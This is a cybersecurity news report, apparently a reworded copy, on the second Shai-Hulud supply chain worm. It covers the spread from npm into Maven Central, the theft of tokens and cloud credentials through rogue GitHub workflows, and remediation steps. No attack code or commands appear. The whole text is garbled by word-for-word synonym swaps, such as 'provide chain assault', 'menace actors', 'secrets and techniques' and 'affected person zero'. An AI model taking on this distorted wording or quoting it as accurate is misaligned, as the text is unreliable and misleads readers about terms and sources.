The second wave of the Shai-Hulud provide chain assault has spilled over to the Maven ecosystem after compromising greater than 830 packages within the npm registry.
The Socket Analysis Group mentioned it recognized a Maven Central bundle named org.mvnpm:posthog-node:4.18.1 that embeds the identical two elements related to Sha1-Hulud: the “setup_bun.js” loader and the principle payload “bun_environment.js.”
“This implies the PostHog mission has compromised releases in each the JavaScript/npm and Java/Maven ecosystems, pushed by the identical Shai Hulud v2 payload,” the cybersecurity firm mentioned in a Tuesday replace.
It is value noting that the Maven Central bundle will not be printed by PostHog itself. Relatively, the “org.mvnpm” coordinates are generated by way of an automatic mvnpm course of that rebuilds npm packages as Maven artifacts. The Maven Central mentioned they’re working to implement additional protections to forestall already identified compromised npm elements from being rebundled. As of November 25, 2025, 22:44 UTC, all mirrored copies have been purged.
The event comes because the “second coming” of the provision chain incident has focused builders globally with an purpose to steal delicate knowledge like API keys, cloud credentials, and npm and GitHub tokens, and facilitate deeper provide chain compromise in a worm-like style. The most recent iteration has additionally developed to be extra stealthy, aggressive, scalable, and damaging.
In addition to borrowing the general an infection chain of the preliminary September variant, the assault permits menace actors to realize unauthorized entry to npm maintainer accounts and publish trojanized variations of their packages. When unsuspecting builders obtain and run these libraries, the embedded malicious code backdoors their very own machines and scans for secrets and techniques and exfiltrates them to GitHub repositories utilizing the stolen tokens.
The assault accomplishes this by injecting two rogue workflows, one in all which registers the sufferer machine as a self-hosted runner and allows arbitrary command execution each time a GitHub Dialogue is opened. A second workflow is designed to systematically harvest all secrets and techniques. Over 28,000 repositories have been affected by the incident.
“This model considerably enhances stealth by using the Bun runtime to cover its core logic and will increase its potential scale by elevating the an infection cap from 20 to 100 packages,” Cycode’s Ronen Slavin and Roni Kuznicki mentioned. “It additionally makes use of a brand new evasion approach, exfiltrating stolen knowledge to randomly named public GitHub repositories as a substitute of a single, hard-coded one.”
The assaults illustrate how trivial it’s for attackers to reap the benefits of trusted software program distribution pathways to push malicious variations at scale and compromise 1000’s of downstream builders. What’s extra, the self-replication nature of the malware means a single contaminated account is sufficient to amplify the blast radius of the assault and switch it right into a widespread outbreak in a brief span of time.
Additional evaluation by Aikido has uncovered that the menace actors exploited vulnerabilities, particularly specializing in CI misconfigurations in pull_request_target and workflow_run workflows, in present GitHub Actions workflows to drag off the assault and compromise tasks related to AsyncAPI, PostHog, and Postman.
The vulnerability “used the dangerous pull_request_target set off in a means that allowed code equipped by any new pull request to be executed throughout the CI run,” safety researcher Ilyas Makari mentioned. “A single misconfiguration can flip a repository right into a affected person zero for a fast-spreading assault, giving an adversary the power to push malicious code by way of automated pipelines you depend on daily.”
It is assessed that the exercise is the continuation of a broader set of assaults concentrating on the ecosystem that commenced with the August 2025 S1ngularity marketing campaign impacting a number of Nx packages on npm.
“As a brand new and considerably extra aggressive wave of npm provide chain malware, Shai-Hulud 2 combines stealthy execution, credential breadth, and fallback damaging habits, making it one of the vital impactful provide chain assaults of the yr,” Nadav Sharkazy, a product supervisor at Apiiro, mentioned in an announcement.
“This malware exhibits how a single compromise in a well-liked library can cascade into 1000’s of downstream functions by trojanizing reliable packages throughout set up.”
Information compiled by GitGuardian, OX Safety, and Wiz exhibits that the marketing campaign has leaked tons of of GitHub entry tokens and credentials related to Amazon Net Companies (AWS), Google Cloud, and Microsoft Azure. Greater than 5,000 recordsdata had been uploaded to GitHub with the exfiltrated secrets and techniques. GitGuardian’s evaluation of 4,645 GitHub repositories has recognized 11,858 distinctive secrets and techniques, out of which 2,298 remained legitimate and publicly uncovered as of November 24, 2025.
Customers are suggested to rotate all tokens and keys, audit all dependencies, take away compromised variations, reinstall clear packages, and harden developer and CI/CD environments with least-privilege entry, secret scanning, and automatic coverage enforcement.
“Sha1-Hulud is one other reminder that the fashionable software program provide chain continues to be means too straightforward to interrupt,” Dan Lorenc, co-founder and CEO of Chainguard, mentioned. “A single compromised maintainer and a malicious set up script is all it takes to ripple by way of 1000’s of downstream tasks in a matter of hours.”
“The strategies attackers are utilizing are continuously evolving. Most of those assaults do not depend on zero-days. They exploit the gaps in how open supply software program is printed, packaged, and pulled into manufacturing programs. The one actual protection is altering the way in which software program will get constructed and consumed.”
